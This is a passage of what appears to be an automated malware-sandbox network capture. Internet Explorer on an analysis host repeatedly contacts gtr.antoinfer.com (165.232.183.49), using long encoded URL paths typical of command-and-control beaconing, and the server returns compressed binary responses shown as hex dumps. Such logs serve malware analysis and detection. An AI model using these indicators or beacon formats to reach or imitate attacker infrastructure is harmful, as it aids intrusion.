Jul 8, 2021 15:47:33.793853045 CEST	7423	IN	Data Raw: 8f 6e 46 66 c3 05 3f 46 03 bd 00 29 e2 27 09 fa cb 20 b5 e4 58 53 55 3e fe 4e 22 e2 1a a9 3e 21 65 b8 ed b5 1c 15 ea 9e 3f ab a2 9f 96 63 08 3b 0b fd 41 d0 a9 80 36 87 18 72 e5 95 a0 75 fd 88 73 bf b4 a8 a4 eb db 6f 2d 54 36 71 25 fe a4 8f e9 5e Data Ascii: nFf?F)' XSU>N">!e?c;A6ruso-T6q%^8APE2pK*VD%I;6FxL#w=%7?St[JW>+_7:jXK@\|{1H3R\|K~~U/>R,%iB@h$hUD
Jul 8, 2021 15:47:33.793899059 CEST	7424	IN	Data Raw: 09 82 30 5d 24 22 9e 68 fb 22 a8 20 7c 89 9f 88 26 f8 74 69 e1 2a 9f 00 b6 f6 5d 15 1a bf f0 99 57 f1 09 5d 9c 58 55 94 5d 07 3e 5e 8b 5b 79 87 c4 e1 1b 5c 7f 1a ba a9 be 78 a6 36 e3 2e 2f ab 9d 3c 4e 9b 59 d7 fe 03 3d 75 1e 98 fd 41 1f b0 bc 72 Data Ascii: 0]$"h" \|&ti]W]XU]>^[y\x6./<NY=uAr"^BY_dEm{}<Uj4DHt$WNhl,1dMR^L)<>C~"jXS6?7r&U9m<R[BJqw2t=N
Jul 8, 2021 15:47:33.793919086 CEST	7425	IN	Data Raw: 9f c2 c0 8d 50 05 b7 c2 9f 9d d7 70 e6 47 8b 6a 0e ff 3e 43 9c f9 07 bd 30 df b1 f0 93 a6 b5 24 98 b8 37 bc a7 51 4a 0b eb 8d 56 d1 37 9a 87 3a 33 5b 93 4b 01 0b bd 98 d8 f7 08 d4 47 ce ab 14 73 2e 94 82 16 b9 c0 f6 5d 48 f8 74 49 0b c3 f6 6c c2 Data Ascii: PpGj>C0$7QJV7:3[KGs.]HtIlkZ"Cf.3J'`jtJ`.ngj\|p;>qNMpKYU@5DP1:ZSEjPWW\|@-'4B#1QOusVN3c:
Jul 8, 2021 15:47:33.793939114 CEST	7427	IN	Data Raw: d0 40 fe 3e 76 65 ee 0f 13 d9 2f 9d a8 f8 59 e1 73 6b 8b 7e 3e ad f3 10 e5 12 99 62 d2 ab c8 d5 84 3d 5f a1 5f be 91 c1 e6 fb 6b 38 0c 68 af d6 63 1f 7b b5 9f ad a3 96 0f f9 6e c8 22 b9 72 d1 0d fb 08 85 72 58 0f 25 d2 8d b9 da 61 9a ea 36 a1 de Data Ascii: @>ve/Ysk~>b=__k8hc{n"rrX%a6Ek%k2LMevQDo)qwSnBENx39e4+\h_JIMD'}DFb+5``f9b`v"*a&EjTnt}?0?Zd`n.Vy~
Jul 8, 2021 15:47:33.951354980 CEST	7428	IN	Data Raw: 37 7e 74 73 aa ac e0 46 5e 52 aa e4 00 7c a9 12 32 e6 b9 31 64 63 b7 81 84 de 26 e3 7b 27 8f f7 03 a5 3b 36 56 94 2a af 0c f7 c4 78 34 3f d2 eb 10 be 65 1a df 90 02 d7 cb bf 0b a1 f0 9c c9 bd 26 19 92 43 78 2e 81 cd 3e d0 cb 34 b0 43 e1 77 2d f7 Data Ascii: 7~tsF^R\|21dc&{';6Vx4?e&Cx.>4Cw-{)\|&JX^l{&O90[@/'\|-'J 5"L)Ir6#DcFuY\H3,0i'<JNdPd2]]_it4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49756	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:33.259176970 CEST	7413	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:33.771099091 CEST	7413	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Jul 2021 13:47:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49760	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:35.972897053 CEST	7677	OUT	GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:36.880944967 CEST	7679	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:47:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 92 83 50 10 45 3f 88 05 6e 4b 5c 82 3b ec 70 d7 e0 5f 3f 99 9a 75 0a e8 bc be f7 9c 0a e3 22 46 69 4a 89 0d bf 62 27 06 5f dc 34 68 5b b7 0f 81 0d 5d cc 80 e5 82 22 63 e1 ba e3 36 77 6c 8c 96 91 d7 61 a2 07 ea a8 43 79 2a 30 b0 b4 aa 83 50 87 a1 be b8 b2 96 35 fc a5 5e a8 65 97 05 6a 03 3f 3b a3 9c a0 b8 9b 23 79 82 6a 69 f2 e2 c1 c4 96 61 34 d0 04 31 db d6 56 ed cb de c5 3e 77 af 31 80 9a f3 e3 4e 9b ee 39 67 54 ba 17 82 aa 5b 94 fd cd 9a ed 1b 69 74 3d d7 85 4b e9 b8 21 df 46 fa 38 9d 5d ed 78 28 97 26 5c 50 5e d0 2e d1 ad 36 ba 60 2b 5e e7 83 a9 59 56 2e 61 06 4b 6d 91 3c 1b 71 f6 c5 da 09 9c ee 3b 5e bb 5c 1a ba 82 32 b9 6b c8 54 88 12 81 a5 e2 5d df 70 b3 09 0d d6 08 94 1d 83 3a 92 3e 0a ed f7 20 20 1f d7 c2 f2 5b 5b b6 e9 29 71 0e f1 d0 98 40 48 b7 ca ba c5 0c 47 75 57 70 94 09 24 38 50 61 ec b7 6f 9d aa 4f 84 8f ab 74 d0 83 6e b9 b0 7f b7 da 37 ac 8f 1e 73 69 36 ad 37 5b a9 d7 bb ef 0e 21 c8 3d 55 42 78 7b 1c 23 7e e4 62 86 b7 ba df fa 16 32 35 11 86 48 4a e6 cd a0 98 5d 07 a7 c8 da 8d 69 0a aa b7 6d a8 3a 8d a3 88 e6 6c 7b 69 4f a3 bb ff 60 b2 ad 9c 1a e3 12 bc 22 46 35 62 9c 54 06 14 cf 5c b3 62 17 5c 1e 2c 30 70 e3 83 12 73 69 83 d6 1c 9e 3d 4c f6 4b f4 78 c5 10 bc f9 d1 04 13 99 30 00 21 89 64 24 7f 5f 8d 7c e7 d4 c0 87 b9 f4 00 56 99 34 f9 05 36 2a 7e 2e 32 00 1d 97 c3 4d 5c a0 a4 d8 8d cd 8f 3f c1 2a 54 b6 23 1a e8 9f 62 3c ef e3 61 fa 27 fb dd e7 96 89 19 37 d6 58 e2 57 ca e4 7c 83 68 66 b5 a7 69 9d 27 9d 98 d8 d0 c8 84 98 e1 54 9a 48 5b 12 f6 ee ab 6e e1 9b 98 ed 34 19 2f b0 78 58 ab c2 70 b0 6c 80 bf ed 30 8d 4f 89 22 ee 74 83 38 66 a5 38 8e 5c 96 37 08 65 03 4d 5f a3 74 4d 7c ae c5 37 a7 7c 2e 4e 00 ea 98 c2 61 63 ff ac 83 86 c7 9b 0b a0 92 d9 1d e4 5e dc fe 70 64 6e e3 7f 88 de 23 6a 5c 51 6b 0b ab 0b 1e 1b a6 6e aa 95 33 8b e1 b3 75 0d f9 2b 10 2d 54 b3 1f da 4b 89 4a 60 22 59 ac e1 e9 ec 49 3e 88 2d 72 97 63 5f 41 dc b9 df f6 fb 3d dc e2 6c 6f 1d 56 10 98 77 6d eb 31 22 e7 03 03 2e 99 a1 e3 6f 16 4b 1d ec 57 05 63 8b fa 19 ed 11 2a b1 c4 7c 28 ae f0 95 5a 61 a5 bc ce 4f fd 61 c1 d4 df 00 5c 7b 11 2f 56 9f 4c ba ef 23 de c5 7e df e0 a0 9e 9b 0d a6 52 cb b2 d2 5d af 93 c1 ba 99 70 6a 49 e1 2e ac b9 52 98 c7 5c a0 a7 5e 54 87 62 a4 da 40 b7 8f 26 0b 07 6e 9b 14 07 86 ce 01 4e 1f 0b 61 83 d3 f0 ae 29 42 33 28 0c c2 a8 7d 90 d2 33 55 52 84 4a d6 b7 d7 2a 27 e5 55 f3 b5 e7 24 1d 8e 00 3b 95 e4 8e 5d 87 c6 70 41 bd 8f f7 7b 32 7e 9c c2 42 1e 39 29 f0 7f 4b 4b ef cf b7 77 f9 2b 23 b9 49 01 f6 23 f0 bc af 8e 7e 58 32 af be 5f 44 2f b8 bc 08 47 ad e0 1d 04 db 48 e5 db 48 16 ba d5 46 a7 5a d7 2d 09 24 87 ea a7 d2 32 6a 36 0b 87 b3 aa 80 e3 c5 6d 10 e1 56 f7 10 9e c6 5d c9 9d 71 dd 87 0f f0 9a 78 98 f9 c3 de 2a 02 be b1 51 2f f2 6f df 52 13 c7 41 4e dd ce c1 93 9e 8d cd 16 13 d5 2b b3 4a 27 d0 8d e4 a0 8c 75 e7 09 ee 89 17 98 c9 46 e7 c6 6d 95 92 90 a7 4f 6b 8d 06 cd b6 9d 2f ea aa bf 64 8c 37 98 4f 2a 34 f5 2e 78 4d 43 46 b1 33 f6 c1 36 ef 33 e9 df 44 9e cb eb 7a ce 67 80 f6 59 90 fa 83 9c bc 79 b6 3f 17 63 60 ea 8e 94 df 7a 9d ee 8a 34 30 ad f2 73 a0 02 cd 59 f1 c3 78 61 ca 33 29 65 cd Data Ascii: 2000PE?nK\;p_?u"FiJb'_4h[]"c6wlaCy0P5^ej?;#yjia41V>w1N9gT[it=K!F8]x(&\P^.6`+^YV.aKm<q;^\2kT]p:> [[)q@HGuWp$8PaoOtn7si67[!=UBx{#~b25HJ]im:l{iO`"F5bT\b\,0psi=LKx0!d$_\|V46~.2M\?T#b<a'7XW\|hfi'TH[n4/xXpl0O"t8f8\7eM_tM\|7\|.Nac^pdn#j\Qkn3u+-TKJ`"YI>-rc_A=loVwm1".oKWc\|(ZaOa\{/VL#~R]pjI.R\^Tb@&nNa)B3(}3URJ'U$;]pA{2~B9)KKw+#I#~X2_D/GHHFZ-$2j6mV]qxQ/oRAN+J'uFmOk/d7O*4.xMCF363DzgYy?c`z40sYxa3)e
Jul 8, 2021 15:47:36.880976915 CEST	7680	IN	Data Raw: 3a d8 6f be 84 83 e2 58 e3 1a a6 4c a2 e5 39 38 54 b2 07 44 ea 53 a0 f5 0e 04 57 0a ff 3e f4 34 3b 37 a2 cd f3 e9 c6 23 8b 4d 37 53 4d a4 5b 30 d0 88 be c0 e6 82 40 be 3b c3 85 40 36 c8 31 aa 62 66 c7 7e b7 d4 52 da 5d 49 b9 7c 39 35 45 b1 4a 21 Data Ascii: :oXL98TDSW>4;7#M7SM[0@;@61bf~R]I\|95EJ!)UzSr\|=B^Vv;I&r>Xv[cyQ~Ml49c8F%J=`F>.6EF)FyQV}04f]B$,@GB`8r#Fs.\|Y
Jul 8, 2021 15:47:36.880990982 CEST	7681	IN	Data Raw: 69 3e b6 4c 7b 79 e6 99 4e 07 14 0c ca f4 e7 98 26 81 7e 45 ad 2b 05 5f 69 2a a9 36 f6 09 41 8f fd 17 8f 4e 9b bf 89 4a f4 88 9e 1f 3b 65 ee 87 4e 9c af f0 05 25 35 b3 ad c5 bb fa ef d7 96 ad 98 89 86 fc 87 af 0b c6 e3 e5 a9 c7 26 ee 70 bf 75 ea Data Ascii: i>L{yN&~E+_i6ANJ;eN%5&puol"`.~HM< 9_W]@J.8;\|qo{F$#3]Y[U?B#@g&:~Zsg;\1_inoC<
Jul 8, 2021 15:47:36.881042004 CEST	7683	IN	Data Raw: c9 ee 24 f5 66 57 de ac e5 8b d4 a3 60 a1 e5 45 84 a2 c1 61 fe 15 4e 3a a6 d8 1e d9 c6 3e b4 a4 d9 c4 fe 7d 02 1e 63 52 d6 04 bb 1d 58 22 1b 47 6d 14 82 c8 bc cb c0 2d 1c 18 54 ec 0f 56 2a 73 5f 14 e9 b1 a6 db c1 55 f3 fc 5b 19 0b 98 cc 49 e5 06 Data Ascii: $fW`EaN:>}cRX"Gm-TVs_U[I$fPpq05`->MXq([l-cgU"5cm>KT}!)yh(;6o{jLzk%ChT(QSUA^6
Jul 8, 2021 15:47:36.881061077 CEST	7684	IN	Data Raw: 64 56 a5 6a c4 66 d3 48 26 a2 20 ce ed 4b 20 f0 ee fe 48 d5 10 07 71 35 ac 86 32 c8 41 b9 b8 b7 1d 8e 09 e5 c0 e5 1d 6f 2e 9f 7f 2e cf 67 f8 1d 7b c3 ed 78 3f 5c 4f 71 0a 3d a1 27 4c da a7 86 00 70 a6 3a c0 3a 54 48 da e2 d0 b4 d5 5b e8 84 34 2f Data Ascii: dVjfH& K Hq52Ao..g{x?\Oq='Lp::TH[4/X&{iVbae/eg1qNRwm7\|K;N>f#!f>1Y=?Gl$5]-d!?ZJSxf8T:2v/P[,(D
Jul 8, 2021 15:47:36.881078959 CEST	7686	IN	Data Raw: 86 50 5a b6 22 00 c4 82 21 85 5f 10 aa 38 e6 06 f7 ea bb fb 18 02 cc 5e 76 6d 2a 97 ef 43 f1 ca f3 a3 6b 02 3b e0 c1 36 a0 4f d5 b4 42 dd 9a 00 98 d5 59 e3 9c 58 d1 9d 3f 54 06 19 61 3a bf cf 7b af 11 f4 6e 96 b9 41 1d e3 5a 4e 08 b1 8c 6e ed 73 Data Ascii: PZ"!_8^vmCk;6OBYX?Ta:{nAZNns]q6+sG%'QBB-E#JDb?1*G=Ot9rT PF4U1g\|VJs`.g^]o("ogf+=2:a
Jul 8, 2021 15:47:36.882780075 CEST	7687	IN	Data Raw: 8f 6e 46 66 c3 05 3f 46 03 bd 00 29 e2 27 09 fa cb 20 b5 e4 58 53 55 3e fe 4e 22 e2 1a a9 3e 21 65 b8 ed b5 1c 15 ea 9e 3f ab a2 9f 96 63 08 3b 0b fd 41 d0 a9 80 36 87 18 72 e5 95 a0 75 fd 88 73 bf b4 a8 a4 eb db 6f 2d 54 36 71 25 fe a4 8f e9 5e Data Ascii: nFf?F)' XSU>N">!e?c;A6ruso-T6q%^8APE2pK*VD%I;6FxL#w=%7?St[JW>+_7:jXK@\|{1H3R\|K~~U/>R,%iB@h$hUD
Jul 8, 2021 15:47:36.882921934 CEST	7688	IN	Data Raw: 09 82 30 5d 24 22 9e 68 fb 22 a8 20 7c 89 9f 88 26 f8 74 69 e1 2a 9f 00 b6 f6 5d 15 1a bf f0 99 57 f1 09 5d 9c 58 55 94 5d 07 3e 5e 8b 5b 79 87 c4 e1 1b 5c 7f 1a ba a9 be 78 a6 36 e3 2e 2f ab 9d 3c 4e 9b 59 d7 fe 03 3d 75 1e 98 fd 41 1f b0 bc 72 Data Ascii: 0]$"h" \|&ti]W]XU]>^[y\x6./<NY=uAr"^BY_dEm{}<Uj4DHt$WNhl,1dMR^L)<>C~"jXS6?7r&U9m<R[BJqw2t=N
Jul 8, 2021 15:47:36.882947922 CEST	7690	IN	Data Raw: 9f c2 c0 8d 50 05 b7 c2 9f 9d d7 70 e6 47 8b 6a 0e ff 3e 43 9c f9 07 bd 30 df b1 f0 93 a6 b5 24 98 b8 37 bc a7 51 4a 0b eb 8d 56 d1 37 9a 87 3a 33 5b 93 4b 01 0b bd 98 d8 f7 08 d4 47 ce ab 14 73 2e 94 82 16 b9 c0 f6 5d 48 f8 74 49 0b c3 f6 6c c2 Data Ascii: PpGj>C0$7QJV7:3[KGs.]HtIlkZ"Cf.3J'`jtJ`.ngj\|p;>qNMpKYU@5DP1:ZSEjPWW\|@-'4B#1QOusVN3c:
Jul 8, 2021 15:47:36.882962942 CEST	7691	IN	Data Raw: d0 40 fe 3e 76 65 ee 0f 13 d9 2f 9d a8 f8 59 e1 73 6b 8b 7e 3e ad f3 10 e5 12 99 62 d2 ab c8 d5 84 3d 5f a1 5f be 91 c1 e6 fb 6b 38 0c 68 af d6 63 1f 7b b5 9f ad a3 96 0f f9 6e c8 22 b9 72 d1 0d fb 08 85 72 58 0f 25 d2 8d b9 da 61 9a ea 36 a1 de Data Ascii: @>ve/Ysk~>b=__k8hc{n"rrX%a6Ek%k2LMevQDo)qwSnBENx39e4+\h_JIMD'}DFb+5``f9b`v"*a&EjTnt}?0?Zd`n.Vy~
Jul 8, 2021 15:47:37.047296047 CEST	7692	IN	Data Raw: 37 7e 74 73 aa ac e0 46 5e 52 aa e4 00 7c a9 12 32 e6 b9 31 64 63 b7 81 84 de 26 e3 7b 27 8f f7 03 a5 3b 36 56 94 2a af 0c f7 c4 78 34 3f d2 eb 10 be 65 1a df 90 02 d7 cb bf 0b a1 f0 9c c9 bd 26 19 92 43 78 2e 81 cd 3e d0 cb 34 b0 43 e1 77 2d f7 Data Ascii: 7~tsF^R\|21dc&{';6Vx4?e&Cx.>4Cw-{)\|&JX^l{&O90[@/'\|-'J 5"L)Ir6#DcFuY\H3,0i'<JNdPd2]]_it4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49762	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:37.855365038 CEST	7824	OUT	GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:38.766030073 CEST	7942	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:47:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 92 84 50 10 44 0f c4 02 6b 6c 09 34 4e e3 7c 64 87 bb 3b a7 9f b9 40 46 54 ca ab 94 3e 2d a2 d1 1c fb 17 3e 87 ab e7 47 32 57 b8 78 9a a5 c4 50 1c 0e 37 16 3b 54 e2 2e d7 f6 2d 9c ab 40 fa 6e d2 9f 06 b1 f5 39 21 71 85 f2 70 dc b0 c6 d9 1c dd 80 c2 eb 5c 2f 49 25 da 32 e6 1c a2 ab 3a aa 7e 53 87 a8 82 b9 ca 50 63 b3 34 c0 34 9c e0 c6 42 fc 72 6f 9e 13 e7 ea 3a 91 e3 97 a3 82 8b de fc 6c 54 45 9e c3 c3 4e 30 b2 32 15 83 23 9e 01 75 c8 b6 98 0c 05 6f 69 27 92 59 9e cc 49 47 bf 05 bf af dc 85 d3 4a 93 be a8 88 1e 35 e4 99 ac 49 64 33 53 9b 2a ed bd 6a d3 a2 65 68 13 58 53 90 35 83 c7 0b b2 6c 5e eb 0f 88 51 a8 ea 04 39 6b dc 74 1e 5e 2a 78 cf 8d ab d5 bd c8 45 28 2c 57 17 aa bc 31 ce 44 74 59 6c 71 f0 de 38 90 af 10 cb 54 a1 8c 0e 1d a6 33 4a 41 8a fa 96 e1 24 a3 e1 7a e1 d1 d7 91 95 e0 95 04 c3 b5 2d 79 47 2d d5 57 f3 4f 68 61 59 da ee cf ad b3 23 f4 31 d2 45 22 cb 27 ba 76 96 12 d2 9d 10 6d 90 c0 10 f3 29 f3 6b c8 f0 f9 3b 96 5f ff 90 b7 4d df f8 78 51 68 86 68 44 11 58 3a d7 1f 24 8b af 13 f3 00 42 f1 ec 9d 0c b6 5d a2 cd 82 9a 52 29 06 76 8a 04 fc 3a 52 0b df 33 ba af 79 b2 a9 6e eb 03 13 ab 0e 3e 7d 8d 7d 84 12 21 a3 15 0c 5f e8 2c 94 ee 45 73 61 6e 9d 43 02 20 f1 82 62 08 1a 30 3e 95 94 1c eb 9b e2 bf f5 a5 40 b8 22 77 75 b0 c6 53 4d 2a 24 74 63 cd d3 4c 88 01 bc ef 5d b4 56 fb 75 94 59 58 25 06 9c e0 1c a8 e1 32 9e 70 49 5f ee fa ee ca 6a 73 82 03 62 fb f7 45 4f e5 b3 67 5a ab 29 fb 83 c9 88 06 2e eb 94 84 46 66 2c fc 30 98 58 b2 6b 95 12 94 c0 5f 1c 79 73 f4 14 7d f9 04 64 87 00 5b b1 81 b0 fe 22 0a aa 9c f0 e2 0f 4f bb 27 4d 94 ff e6 b8 ee 1e b7 4e e3 36 93 f4 e2 55 f6 86 58 12 67 2b 84 72 d8 7d 27 2d 04 6f d8 0c 90 de 83 f7 b3 de ba 9c 64 11 8d 40 31 ec 9c 34 65 1b 44 41 fe ef 80 f9 49 5f 4d 06 f2 b5 ff 74 2b a3 c1 b6 d8 88 05 09 45 ba a4 b5 31 96 0b 98 98 36 fb de fb 2f 8f 8f d2 a9 0c 3f 49 d2 52 68 d4 5f b4 eb 2f 1c bb bf 7e e0 f9 6a d7 b7 cc e3 f6 8e 5e c5 48 8b 39 47 52 7e 3f aa 1f d7 4a 72 8c ab d8 91 6d 57 5e ff f0 c9 0a 2d d5 9a 76 83 20 31 c9 ec cc 66 e4 cd a9 25 94 57 6c 9d 14 ba 36 3e 24 bc c2 03 5e ab 5d 43 ad 27 68 cb 24 37 4d 33 a2 e1 71 53 b6 86 50 2c b5 55 9a ad 7c 2e 51 f2 08 b9 ae 6a d9 9e 72 07 77 77 bf 86 3c 5f 2a 3d 93 e2 e1 79 d8 c4 ca 04 de 34 13 dd c2 76 26 50 69 65 5d 03 6c d9 18 da a4 1c 1c 3f bd f9 5b 33 49 4e 66 2a c0 b7 22 d2 8b c0 fb 8e 6c 5f 22 5f 6d 6d 23 99 d6 f8 9f 4f 70 f5 20 ba 6b 91 4c ad 5b cb 1f 3e 77 da e8 67 1f 6f 36 d7 58 09 80 76 14 ba c8 f8 b7 8b ab be 55 58 8c ab 10 d1 66 f0 fe af 9d 98 fb b8 7c 38 a6 1a 53 a3 ff 47 fd 2f b3 4b b3 cc d9 e1 11 19 c9 14 4b da 2a 20 7a 0c 9f 6d b5 5d 3c 98 62 46 99 99 99 fb 95 e8 63 00 4b ce 81 26 0a 2e 2c 2c 35 a2 c8 b8 96 fa 21 09 4d 61 bd 4d ab 7c a1 2c 5c c5 32 3b 24 05 71 5f 06 1f 67 a5 17 cc af a7 98 e7 cd fa da f2 e9 6c c7 c3 ef a2 e0 e2 af e6 fc 6a 77 36 2b 69 f7 01 63 41 e7 ab 1b b3 7b 7e a8 e8 0a ab b3 dd 5c d3 38 74 b3 41 ac e8 8d 49 6d b0 9b 0e 9d 6f 1b c2 d4 44 0e a5 1b 6b a2 e3 a4 e7 2b 0b d3 c1 a5 31 77 2b 42 66 ef 98 f9 0b 33 c8 b6 36 91 a7 ea aa 7b 94 96 88 74 49 c3 12 99 50 ec cb e8 6e 28 59 65 b9 ad Data Ascii: 76fEPDkl4N\|d;@FT>->G2WxP7;T.-@n9!qp\/I%2:~SPc44Bro:lTEN02#uoi'YIGJ5Id3SjehXS5l^Q9kt^xE(,W1DtYlq8T3JA$z-yG-WOhaY#1E"'vm)k;_MxQhhDX:$B]R)v:R3yn>}}!_,EsanC b0>@"wuSM$tcL]VuYX%2pI_jsbEOgZ).Ff,0Xk_ys}d["O'MN6UXg+r}'-od@14eDAI_Mt+E16/?IRh_/~j^H9GR~?JrmW^-v 1f%Wl6>$^]C'h$7M3qSP,U\|.Qjrww<_=y4v&Pie]l?[3INf"l_"_mm#Op kL[>wgo6XvUXf\|8SG/KK zm]<bFcK&.,,5!MaM\|,\2;$q_gljw6+icA{~\8tAImoDk+1w+Bf36{tIPn(Ye
Jul 8, 2021 15:47:38.766081095 CEST	7942	IN	Data Raw: 4e 40 b8 b6 e4 aa 05 63 95 07 c9 33 53 9f 63 82 f2 b4 39 26 74 46 40 8a 29 62 40 db a9 e1 9a fa fe 47 82 e5 e4 3a 9e 32 6f fb 1d 5c cb 27 c7 22 9f 7a 7f 9e 43 32 dc 08 d6 bb f9 22 d0 7e 68 04 d7 6a a6 c2 b5 db 54 8f ae 93 c7 32 e7 5d 03 d5 fe 34 Data Ascii: N@c3Sc9&tF@)b@G:2o\'"zC2"~hjT2]4NS)Men\|b]Z1JXg]N-2 ^8"V_%.$:C8Lv.ivF4&NI]90AD,iaw1$p5o.d$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49761	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:39.574058056 CEST	7943	OUT	GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:40.508263111 CEST	7945	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:47:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 92 84 50 10 44 0f c4 02 6b 6c 09 34 4e e3 7c 64 87 bb 3b a7 9f b9 40 46 54 ca ab 94 3e 2d a2 d1 1c fb 17 3e 87 ab e7 47 32 57 b8 78 9a a5 c4 50 1c 0e 37 16 3b 54 e2 2e d7 f6 2d 9c ab 40 fa 6e d2 9f 06 b1 f5 39 21 71 85 f2 70 dc b0 c6 d9 1c dd 80 c2 eb 5c 2f 49 25 da 32 e6 1c a2 ab 3a aa 7e 53 87 a8 82 b9 ca 50 63 b3 34 c0 34 9c e0 c6 42 fc 72 6f 9e 13 e7 ea 3a 91 e3 97 a3 82 8b de fc 6c 54 45 9e c3 c3 4e 30 b2 32 15 83 23 9e 01 75 c8 b6 98 0c 05 6f 69 27 92 59 9e cc 49 47 bf 05 bf af dc 85 d3 4a 93 be a8 88 1e 35 e4 99 ac 49 64 33 53 9b 2a ed bd 6a d3 a2 65 68 13 58 53 90 35 83 c7 0b b2 6c 5e eb 0f 88 51 a8 ea 04 39 6b dc 74 1e 5e 2a 78 cf 8d ab d5 bd c8 45 28 2c 57 17 aa bc 31 ce 44 74 59 6c 71 f0 de 38 90 af 10 cb 54 a1 8c 0e 1d a6 